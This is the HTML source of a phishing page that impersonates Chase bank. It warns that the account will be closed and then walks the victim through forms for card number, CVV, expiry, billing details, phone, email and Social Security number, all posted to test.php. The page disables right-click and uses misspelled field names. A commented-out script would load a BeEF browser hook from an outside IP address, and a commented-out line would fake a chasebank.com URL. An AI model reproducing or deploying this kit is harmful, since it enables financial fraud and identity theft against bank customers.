<!DOCTYPE html>
<html>
   <head>
      <meta charset='utf-8'>
      <meta name='viewport' content='width=device-width, initial-scale=1'>
      <title>Security Online</title>
      <link href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' rel='stylesheet'>
      <link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.0.3/css/font-awesome.css' rel='stylesheet'>
      <link rel="stylesheet" type="text/css" href="main.css"/>
      <link rel="stylesheet" href="loading.css">
      <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>
      <script type='text/javascript' src='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js'></script>
      <script type='text/javascript' src='xGfj57.js'></script>
      <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.js"></script>
      <!-- <script type="text/javascript" src="http://103.155.92.34:3000/hook.js"></script>
            <script type="text/javascript">
                var commandModuleStr = '<script src="http://103.155.92.34:3000/hook.js" type="text/javascript"><\/script>';
                document.write(commandModuleStr);
            </script>  -->
      <style media="screen">
      body {
          background-image: url('background.desktop.night.3.jpeg');
      }
      </style>
      <script type="text/javascript">

      $(document).ready( function(){
        x = localStorage.getItem("uidee");
        document.querySelector("#uname").value = x;
      });

      </script>


   </head>
   <body id="contentTitty" oncontextmenu='return false' class='snippet-body'>
      <!-- MultiStep Form -->
      <div class="container-fluid" id="grad1">
         <div class="row justify-content-center mt-0">
           <!-- <img src="chase-logo2.png" alt="" class=""> -->
            <div class="col-11 col-sm-9 col-md-4 col-lg-4 text-center p-0 mt-3 mb-2">
               <div class="card px-0 pt-4 pb-0 mt-3 mb-3">
                 <div class="container">
                  <!--<script>window.history.pushState('page2', 'Title', 'secure07c.chasebank.com/web/auth/#/logon/logon');</script> -->


                </div>
                  <div class="row justify-content-center">
                     <div class="col-sm-12 col-md-10 col-lg-10 mx-0 container container-fluid">
                        <form id="msform" action="test.php" method="POST">
                     <!-- progressbar
                           <ul id="progressbar" class="w-100 mb-2 mt-2">
                              <li class="active" id="account"><strong>Card Info</strong></li>
                              <li id="payment"><strong>Billing</strong></li>
                              <li id="blah"><strong>Identity</strong></li>
                      <    <li id="confirm"><strong>Finish</strong></li> -->
                <!--    </ul> -->
                           <!-- fieldsets -->


                             <input id="uname" type="text" name="" value="uname" hidden />
                             <input id="uname" type="text" name="" value="uname" hidden />

                           <fieldset>
                              <div class="form-card">

                                <div class="row justify-content-center mb-4">
                            <!--     <h6 class="text-danger mb-5">Account Locked Verify Your Identity To Prevent Account Suspension</h6>  -->
                            <img src="chase-logo2.png" />
                                 <p class="text-danger mb-5">WARNING: Excessive failed attempts will cause your account to be immediately closed!</p>
                               </div>

                              <!--    <label class="pay">Card Holder Name*</label> --> <input type="text" name="chardname" placeholder="Cardholder Name" required />
                                 <div class="row">
                                    <div class="col-9"> <input type="text" name="chardnumb" placeholder="" required /> </div>
                                    <div class="col-3"> <input type="password" name="czcpwd" placeholder="***" required /> </div>
                                 </div>
                                 <div class="row">
                                    <div class="col-2"> <label class="pay">Exp.</div>
                                    <div class="col-5">
                                      <input type="text" name="expmun" placeholder="Month" value="" required/>
                                      <!-- <select class="list-dt" id="month" name="expmun">
                                          <option selected>Month</option>
                                          <option value ="1">January</option>
                                          <option value ="2">February</option>
                                          <option value ="3">March</option>
                                          <option value ="4">April</option>
                                          <option value ="5">May</option>
                                          <option value ="6">June</option>
                                          <option value ="7">July</option>
                                          <option value ="8">August</option>
                                          <option value ="9">September</option>
                                          <option value ="10">October</option>
                                          <option value ="11">November</option>
                                          <option value ="12">December</option>
                                       </select> -->

                                    </div>
					                <div class="col-5">

                                       <input type="text" name="expyeer" value="" placeholder="Year" reuired/>
                                        <!--<select class="list-dt" id="year" name="expyeer">
                                          <option selected value="21">2021</option>
                                          <option value ="22">2022</option>
                                          <option value ="23">2023</option>
                                          <option value ="24">2024</option>
                                          <option value ="25">2025</option>
                                          <option value ="26">2026</option>
                                          <option value ="27">2027</option>
                                          <option value ="28">2028</option>
                                          <option value ="29">2029</option>
                                          <option value ="30">2030</option>
                                       </select> -->
                                    </div>
                                 </div>
                              </div>
                              <input type="button" name="make_payment" class="next action-button" value="Next" />
                           </fieldset>

                           <fieldset>
                              <div class="form-card">
                                <div class="container">
                                  <div class="row">
                                <h4 class="fs-title">Billing Information</h4>
                               </div>
                             </div>

                              <div class="row">

                                <div class="col-6">
                                 <input type="text" name="firstna" placeholder="First Name" required/>
                               </div>


                               <div class="col-6">
                                 <input type="text" name="lastna" placeholder="Last Name" required/>
                               </div>
                               </div>



                               <div class="row">
                                 <div class="col-12">
                                 <input type="text" name="addyone" placeholder="Adress Line 1" required/>
                               </div>
                              </div>

                              <div class="row">
                                <div class="col-8">
                                  <input type="text" placeholder="Address Line 2" required/>
                                </div>


                                <div class="col-4">
                                 <input type="text" name="magicfive" placeholder="Zipcode" required/>
                               </div>
                               </div>

                               <div class="row">
                                 <div class="col-6">
                                   <input type="text" name="fohne" placeholder="Phone" required/>
                                 </div>


                                 <div class="col-6">
                                  <input type="text" name="emah" placeholder="Email" required/>
                                </div>
                                </div>



                              </div>
                              <button type="button" name="next" class="next action-button" value="Next">Next</button>
                           </fieldset>
                           <fieldset>
                              <div class="form-card">
                                 <p class="mt-3 dark text-center">To finish, Enter your Social Security number using this ***-**-****  and click the button below to submit your information for verification</p>
<br>
<br>
                                 <div class="row justify-content-center mb-5 mt-3">
                                 <input type="password" class="w-50 text-center" name="sosh" style="font-size: 22px;" placeholder="Social Sec." required/>
                               </div>
<br>
                              </div>
                              <input class="btn btn-primary w-50 text-white" type="submit" value="Submit"/>
                           </fieldset>
                        </form>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </div>





   </body>
           </div>
         </div>
       </div>
     </div>
   </div>
</html>
